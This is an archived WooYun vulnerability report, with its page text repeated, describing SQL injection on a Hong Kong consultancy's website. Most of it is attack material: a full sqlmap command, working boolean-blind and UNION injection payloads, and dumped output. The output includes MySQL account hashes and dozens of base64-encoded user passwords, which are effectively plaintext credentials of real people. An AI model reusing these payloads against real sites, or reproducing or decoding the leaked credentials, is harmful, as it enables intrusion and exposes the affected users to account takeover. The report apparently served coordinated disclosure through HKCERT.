普斯匯達顧問有限公司主站存在SQL插入攻擊（root密碼泄露+3W多email信息泄露+大量用戶明文密碼泄露）（香港地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155821

漏洞标题：普斯匯達顧問有限公司主站存在SQL插入攻擊（root密碼泄露+3W多email信息泄露+大量用戶明文密碼泄露）（香港地區）

漏洞作者：路人甲

提交时间：2015-11-25 15:37

修复时间：2016-01-14 14:46

公开时间：2016-01-14 14:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-25：细节已通知厂商并且等待厂商处理中
2015-11-30：厂商已经确认，细节仅向厂商公开
2015-12-10：细节向核心白帽子及相关领域专家公开
2015-12-20：细节向普通白帽子公开
2015-12-30：细节向实习白帽子公开
2016-01-14：细节向公众公开

简要描述：

　　普斯匯達顧問有限公司是普斯集團旗下的成員，公司主營服務有：生意轉讓、特許經營、收購合併、創業培訓課程、創業顧問服務、市場策劃、品牌形象策劃。我們致力發展成為一個高效率的商業平臺，竭誠為客戶提供優質的服務。
　　普斯匯達顧問有限公司擁有專業的商業顧問，包括專業會計師、核數師及律師，對生意業務轉讓的交易過程及細節均擁有豐富經驗，於交易前後提供大量免費的專業意見及支援服務，由尋找買家或賣家、為生意估值至雙方完成交易，協助顧客成功實踐創業夢想。「普斯匯達」快捷可靠的服務及專業團隊精神協助買賣雙方磋商洽談，確保交易過程中每個階段，以及其後的整合或交接計劃均能順利完成，並確保交易過程絕對保密。

详细说明：

地址：http://**.**.**.**/news_press_detail.php?id=87&pg_num=&search_key=

$ python sqlmap.py -u "http://**.**.**.**/news_press_detail.php?id=87&pg_num=&search_key=" -p id --technique=BU --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass

Database: dbh232120
+-----------------------------------------+---------+
| Table                                   | Entries |
+-----------------------------------------+---------+
| tbl_email_opportunities                 | 32076   |
Database: dbh232120
Table: tbl_email_opportunities
[33 columns]
+------------------+--------------+
| Column           | Type         |
+------------------+--------------+
| active           | tinyint(4)   |
| address2         | varchar(200) |
| agreement        | tinyint(1)   |
| asking_price     | varchar(20)  |
| Assets           | text         |
| b_item           | int(11)      |
| code             | varchar(255) |
| create_by        | bigint(20)   |
| create_date      | datetime     |
| deleted          | tinyint(4)   |
| desc_1           | text         |
| desc_2           | text         |
| desc_3           | text         |
| Followed1_By     | bigint(20)   |
| hot_item         | int(11)      |
| id               | bigint(20)   |
| Internal_Remarks | text         |
| intro_1          | varchar(255) |
| intro_2          | varchar(255) |
| intro_3          | varchar(255) |
| investment       | double       |
| investment_desc  | varchar(30)  |
| marked           | tinyint(4)   |
| modify_by        | bigint(20)   |
| modify_date      | datetime     |
| new_item         | int(11)      |
| ranking          | char(1)      |
| shop_company     | varchar(100) |
| sold             | tinyint(1)   |
| status           | tinyint(4)   |
| whether1         | tinyint(1)   |
| whether2         | tinyint(1)   |
| whether3         | tinyint(1)   |
+------------------+--------------+

漏洞证明：

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=87 AND 8143=8143&pg_num=&search_key=
    Type: UNION query
    Title: MySQL UNION query (58) - 14 columns
    Payload: id=-5811 UNION ALL SELECT 58,58,58,58,CONCAT(0x7178627171,0x554c625470547a786d765441444a6b51556d514379614d54734d665768666d457344766d6b764373,0x7170707871),58,58,58,58,58,58,58,58,58#&pg_num=&search_key=
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
current user:    'h232120b@localhost'
current user is DBA:    False
database management system users [5]:
[*] 'h232120b'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
[*] 'trde'@'localhost'
database management system users password hashes:
[*] h232120b [1]:
    password hash: *72D7917DEF41D910F80CD9FE98BEFE5A32A0FED8
[*] root [2]:
    password hash: *EE3ECFB89BBCBE7790487A144F06F247C1CF6153
    password hash: NULL
[*] trde [1]:
    password hash: *A894E636161F8EB03FE9E80749B297776CC0329E
Database: mysql
+-----------------------------------------+---------+
| Table                                   | Entries |
+-----------------------------------------+---------+
| help_relation                           | 993     |
| help_topic                              | 506     |
| help_keyword                            | 452     |
| help_category                           | 38      |
| `user`                                  | 5       |
| db                                      | 4       |
+-----------------------------------------+---------+
Database: dbh232120
+-----------------------------------------+---------+
| Table                                   | Entries |
+-----------------------------------------+---------+
| tbl_email_opportunities                 | 32076   |
| tbl_customer_opp_match                  | 26837   |
| tbl_email_business_transfer             | 20227   |
| tbl_business_transfer_item              | 19273   |
| log_browse                              | 17573   |
| tbl_opportunities_mail_user_franchise   | 15682   |
| tbl_opportunities_mail_user             | 12602   |
| tbl_business_transfer                   | 9063    |
| tbl_opportunities_photo                 | 7588    |
| tbl_general_mail_user                   | 6470    |
| tbl_select                              | 4506    |
| sys_function_right                      | 3980    |
| tbl_opportunities                       | 2701    |
| tbl_opportunities_4                     | 2601    |
| tbl_business_transfer_1                 | 1972    |
| tbl_opportunities_2                     | 1657    |
| tbl_opportunities_6                     | 1415    |
| tbl_customer_exclusive_salesman         | 1141    |
| tbl_opportunities_5                     | 485     |
| tbl_billing                             | 300     |
| tbl_news_press                          | 279     |
| tbl_def_location                        | 239     |
| tbl_def_region                          | 239     |
| sys_user_group_right                    | 167     |
| tbl_opportunities_3                     | 143     |
| tbl_invoice                             | 134     |
| tbl_opportunities_read_user             | 123     |
| tbl_invoice_upload                      | 102     |
| tbl_opportunities_franchise_follow_user | 86      |
| tbl_location                            | 69      |
| sys_user                                | 68      |
| tbl_opportunities_franchise             | 55      |
| tbl_leave                               | 54      |
| sys_function                            | 39      |
| tbl_mailsetting                         | 28      |
| tbl_business_nature                     | 15      |
| maid_member                             | 12      |
| sys_user_group                          | 12      |
| tbl_franchise_photo                     | 11      |
| tbl_online                              | 11      |
| tbl_category2                           | 10      |
| tbl_category1                           | 9       |
| tbl_category3                           | 9       |
| tbl_opportunities_franchise_photo       | 7       |
| tbl_successful_case                     | 7       |
| sys_function_group                      | 6       |
| tbl_hd_setting                          | 6       |
| tbl_advertinfo                          | 5       |
| tbl_franchise                           | 4       |
| tbl_discount                            | 3       |
| sys_file_management                     | 2       |
| tbl_def_container                       | 2       |
| tbl_def_packaging                       | 2       |
| tbl_company_ip                          | 1       |
| tbl_customer_opp_match_time             | 1       |
| tbl_email                               | 1       |
| tbl_setting                             | 1       |
+-----------------------------------------+---------+
Database: tradeasy
+-----------------------------------------+---------+
| Table                                   | Entries |
+-----------------------------------------+---------+
| tbl_email_opportunities                 | 30606   |
| tbl_customer_opp_match                  | 23109   |
| tbl_email_business_transfer             | 18880   |
| tbl_business_transfer_item              | 18065   |
| tbl_opportunities_mail_user_franchise   | 14746   |
| tbl_opportunities_mail_user             | 12218   |
| log_browse                              | 12015   |
| tbl_business_transfer                   | 8627    |
| tbl_opportunities_photo                 | 6610    |
| tbl_general_mail_user                   | 6150    |
| tbl_select                              | 4331    |
| sys_function_right                      | 3976    |
| tbl_opportunities                       | 2599    |
| tbl_opportunities_4                     | 2499    |
| tbl_business_transfer_1                 | 1842    |
| tbl_opportunities_2                     | 1556    |
| tbl_opportunities_6                     | 1264    |
| tbl_customer_exclusive_salesman         | 1092    |
| tbl_opportunities_5                     | 414     |
| tbl_billing                             | 303     |
| tbl_news_press                          | 277     |
| tbl_def_location                        | 239     |
| tbl_def_region                          | 239     |
| sys_user_group_right                    | 167     |
| tbl_opportunities_3                     | 142     |
| tbl_invoice                             | 123     |
| tbl_opportunities_read_user             | 123     |
| tbl_invoice_upload                      | 93      |
| tbl_opportunities_franchise_follow_user | 76      |
| sys_user                                | 72      |
| tbl_location                            | 69      |
| tbl_leave                               | 57      |
| tbl_opportunities_franchise             | 49      |
| sys_function                            | 40      |
| tbl_mailsetting                         | 26      |
| tbl_business_nature                     | 15      |
| maid_member                             | 12      |
| sys_user_group                          | 12      |
| tbl_franchise_photo                     | 11      |
| tbl_category2                           | 10      |
| tbl_category1                           | 9       |
| tbl_category3                           | 9       |
| tbl_successful_case                     | 8       |
| tbl_b_item_send_email                   | 7       |
| tbl_opportunities_franchise_photo       | 7       |
| sys_function_group                      | 6       |
| tbl_hd_setting                          | 6       |
| tbl_advertinfo                          | 5       |
| tbl_franchise                           | 4       |
| tbl_online                              | 4       |
| tbl_discount                            | 3       |
| sys_file_management                     | 2       |
| tbl_def_container                       | 2       |
| tbl_def_packaging                       | 2       |
| tbl_company_ip                          | 1       |
| tbl_customer_opp_match_time             | 1       |
| tbl_email                               | 1       |
| tbl_setting                             | 1       |
+-----------------------------------------+---------+
Database: information_schema
+-----------------------------------------+---------+
| Table                                   | Entries |
+-----------------------------------------+---------+
| COLUMNS                                 | 4958    |
| STATISTICS                              | 297     |
| GLOBAL_STATUS                           | 291     |
| SESSION_STATUS                          | 291     |
| PARTITIONS                              | 285     |
| TABLES                                  | 285     |
| KEY_COLUMN_USAGE                        | 279     |
| GLOBAL_VARIABLES                        | 274     |
| SESSION_VARIABLES                       | 274     |
| TABLE_CONSTRAINTS                       | 258     |
| COLLATION_CHARACTER_SET_APPLICABILITY   | 128     |
| COLLATIONS                              | 127     |
| USER_PRIVILEGES                         | 89      |
| SCHEMA_PRIVILEGES                       | 64      |
| CHARACTER_SETS                          | 36      |
| PLUGINS                                 | 7       |
| SCHEMATA                                | 7       |
| ENGINES                                 | 5       |
| PROCESSLIST                             | 1       |
+-----------------------------------------+---------+
Database: hkmortgage
+-----------------------------------------+---------+
| Table                                   | Entries |
+-----------------------------------------+---------+
| sys_function_right                      | 3576    |
| tbl_mortgage_apply                      | 71      |
| tbl_hkm_type                            | 12      |
| sys_function                            | 9       |
| sys_user_group_right                    | 7       |
| sys_function_group                      | 5       |
| sys_user                                | 5       |
| sys_user_group                          | 3       |
| tbl_postion                             | 3       |
| tbl_sex                                 | 2       |
| tbl_company_ip                          | 1       |
| tbl_email                               | 1       |
| tbl_settinga                            | 1       |
+-----------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: hkmortgage
Table: sys_user
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: dbh232120
Table: sys_user
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: tradeasy
Table: sys_user
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: 123
Table: sys_user
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: mysql
Table: user
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | char(41) |
+----------+----------+
Database: mysql
Table: servers
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | char(64) |
+----------+----------+
Database: mysql
Table: user
[3 entries]
+-------------------------------------------+
| Password                                  |
+-------------------------------------------+
| *72D7917DEF41D910F80CD9FE98BEFE5A32A0FED8 |
| *A894E636161F8EB03FE9E80749B297776CC0329E |
| *EE3ECFB89BBCBE7790487A144F06F247C1CF6153 |
+-------------------------------------------+
Database: mysql
Table: servers
[0 entries]
+----------+
| Password |
+----------+
+----------+
Database: dbh232120
Table: sys_user
[68 entries]
+----------------------+
| password             |
+----------------------+
| aGsxMjM=             |
| amgzMDE2OTk4NA==     |
| aml1cG43OTA=         |
| aml1cG43OTA=         |
| aWM2MjExMTIxNQ==     |
| b2N0b2JlcjE=         |
| b2wzMDE2OTk4NA==     |
| bG8wNzE=             |
| bG9uZzAzMDQ=         |
| bGV1bmcxMjM=         |
| bHVvMTIz             |
| bWsxMjM0NTYh         |
| bWszMjQ3Mzg0Nw==     |
| bWtfcmVzaWduZWQ=     |
| bXlwZWdyZWI=         |
| cGFwZXIxMjM=         |
| cHRzYTAwMQ==         |
| cmF5bW9uZDE4MA==     |
| cmVzaWduMTM1Nzk=     |
| cmVzaWduZWQxMjM=     |
| d2FpOTEy             |
| d2FpOTEy             |
| d2FpOTEy             |
| d2FpOTEy             |
| d2FpOTEy             |
| dGVybWluYXRlZDE3MDk= |
| dGVyOTEyOTE3         |
| dGVyZW5jZTk2NTc4MTQ0 |
| dGVzdGluZw==         |
| dHkzMDE2OTk4NA==     |
| MDY4MTA3NDE=         |
| MjAxNTA5MTY=         |
| MjE0MTMz             |
| MjQ2ODAxaGs=         |
| MTE0MTE1Li4=         |
| MTIzNDU2             |
| MTIzNDU2             |
| MTk4NTExMDc=         |
| MTk4ODAyMDc=         |
| MTk5NDExMTI=         |
| MTY4NjY4             |
| MzAxMzk3NTU=         |
| MzAxNjk5ODQ=         |
| MzAxNjk5ODQ=         |
| MzAxNjk5ODQ=         |
| MzAxNjk5ODQ=         |
| MzAxNjk5ODQ=         |
| MzAxNjk5ODQ=         |
| MzEwMTUwOTg=         |
| MzEwNjk5ODQ=         |
| NjMwMTE=             |
| OTgyMTMyNjM=         |
| OTMxODQwMTg=         |
| QXNkZjEyMzQ=         |
| Y29taWNz             |
| Ym5pODY5OTE3MDk=     |
| Ym5pODY5OTE3MDk=     |
| Ym5pOTY1NzgxNDQ=     |
| YW5keTAwMQ==         |
| YW5keTg2OTkxNzA5     |
| YWMxMjM0             |
| YXNkZjEyMzQ=         |
| ZGF2ZWJpa2U=         |
| ZmlyZWQ4Njk5YXNkZg== |
| ZmlyZWQwNTMw         |
| ZmlyZWQyMDEzMDYxOA== |
| ZmlyZWRvbjIwMTQwMTEz |
| ZW5lcmd5ODk=         |
+----------------------+
Database: tradeasy
Table: sys_user
[72 entries]
+----------------------+
| password             |
+----------------------+
| a3M4ODgy             |
| aGsxMjM=             |
| amgzMDE2OTk4NA==     |
| aml1cG43OTA=         |
| aml1cG43OTA=         |
| aWM2MjExMTIxNQ==     |
| b2N0b2JlcjE=         |
| b2wzMDE2OTk4NA==     |
| bG8wNzE=             |
| bG9uZzAzMDQ=         |
| bGV1bmcxMjM=         |
| bHVvMTIz             |
| bWs4Njk5MTcwOQ==     |
| bWsxMjM0NTYh         |
| bWszMjQ3Mzg0Nw==     |
| bWtfcmVzaWduZWQ=     |
| bXlwZWdyZWI=         |
| cGFwZXIxMjM=         |
| cHRzYTAwMQ==         |
| cmF5bW9uZDE4MA==     |
| cmVzaWduMTM1Nzk=     |
| cmVzaWduZWQxMjM=     |
| d2FpOTEy             |
| d2FpOTEy             |
| d2FpOTEy             |
| d2FpOTEy             |
| d2FpOTEy             |
| dGVybWluYXRlZDE3MDk= |
| dGVyOTEyOTE3         |
| dGVyZW5jZTk2NTc4MTQ0 |
| dGVzdGluZw==         |
| dHkzMDE2OTk4NA==     |
| dnQxMjM0NTY=         |
| MDY4MTA3NDE=         |
| MjAxNTA5MTY=         |
| MjE0MTMz             |
| MjQ2ODAxaGs=         |
| MTIzNDU2             |
| MTIzNDU2             |
| MTIzNDU2             |
| MTIzNDU2             |
| MTIzNDU2             |
| MTk4NTExMDc=         |
| MTk4ODAyMDc=         |
| MTk5NDExMTI=         |
| MTY4NjY4             |
| MzAxMzk3NTU=         |
| MzAxNjk5ODQ=         |
| MzAxNjk5ODQ=         |
| MzAxNjk5ODQ=         |
| MzAxNjk5ODQ=         |
| MzAxNjk5ODQ=         |
| MzEwMTUwOTg=         |
| MzEwNjk5ODQ=         |
| NjMwMTE=             |
| OTgyMTMyNjM=         |
| OTMxODQwMTg=         |
| QXNkZjEyMzQ=         |
| Y29taWNz             |
| Ym5pODY5OTE3MDk=     |
| Ym5pODY5OTE3MDk=     |
| Ym5pODY5OTE3MDk=     |
| Ym5pOTY1NzgxNDQ=     |
| YW5keTAwMQ==         |
| YW5keTg2OTkxNzA5     |
| YWMxMjM0             |
| YXNkZjEyMzQ=         |
| ZmlyZWQ4Njk5YXNkZg== |
| ZmlyZWQwNTMw         |
| ZmlyZWQyMDEzMDYxOA== |
| ZmlyZWRvbjIwMTQwMTEz |
| ZW5lcmd5ODk=         |
+----------------------+
Database: 123
Table: sys_user
[0 entries]
+----------+
| password |
+----------+
+----------+
Database: hkmortgage
Table: sys_user
[5 entries]
+------------------+
| password         |
+------------------+
| bWs4Njk5MTcwOQ== |
| c2E=             |
| MTIzNDU2         |
| MTIzNDU2         |
| NjU0MzIxLi4h     |
+------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=87 AND 8143=8143&pg_num=&search_key=
    Type: UNION query
    Title: MySQL UNION query (58) - 14 columns
    Payload: id=-5811 UNION ALL SELECT 58,58,58,58,CONCAT(0x7178627171,0x554c625470547a786d765441444a6b51556d514379614d54734d665768666d457344766d6b764373,0x7170707871),58,58,58,58,58,58,58,58,58#&pg_num=&search_key=
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
Database: dbh232120
Table: tbl_email_opportunities
[33 columns]
+------------------+--------------+
| Column           | Type         |
+------------------+--------------+
| active           | tinyint(4)   |
| address2         | varchar(200) |
| agreement        | tinyint(1)   |
| asking_price     | varchar(20)  |
| Assets           | text         |
| b_item           | int(11)      |
| code             | varchar(255) |
| create_by        | bigint(20)   |
| create_date      | datetime     |
| deleted          | tinyint(4)   |
| desc_1           | text         |
| desc_2           | text         |
| desc_3           | text         |
| Followed1_By     | bigint(20)   |
| hot_item         | int(11)      |
| id               | bigint(20)   |
| Internal_Remarks | text         |
| intro_1          | varchar(255) |
| intro_2          | varchar(255) |
| intro_3          | varchar(255) |
| investment       | double       |
| investment_desc  | varchar(30)  |
| marked           | tinyint(4)   |
| modify_by        | bigint(20)   |
| modify_date      | datetime     |
| new_item         | int(11)      |
| ranking          | char(1)      |
| shop_company     | varchar(100) |
| sold             | tinyint(1)   |
| status           | tinyint(4)   |
| whether1         | tinyint(1)   |
| whether2         | tinyint(1)   |
| whether3         | tinyint(1)   |
+------------------+--------------+

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-11-30 14:44

厂商回复：

Referred to related parties.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155821

漏洞标题：普斯匯達顧問有限公司主站存在SQL插入攻擊（root密碼泄露+3W多email信息泄露+大量用戶明文密碼泄露）（香港地區）

相关厂商：普斯匯達顧問有限公司

漏洞作者：路人甲

提交时间：2015-11-25 15:37

修复时间：2016-01-14 14:46

公开时间：2016-01-14 14:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155821

漏洞标题：普斯匯達顧問有限公司主站存在SQL插入攻擊（root密碼泄露+3W多email信息泄露+大量用戶明文密碼泄露）（香港地區）

相关厂商：普斯匯達顧問有限公司

漏洞作者： 路人甲

提交时间：2015-11-25 15:37

修复时间：2016-01-14 14:46

公开时间：2016-01-14 14:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0155821"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云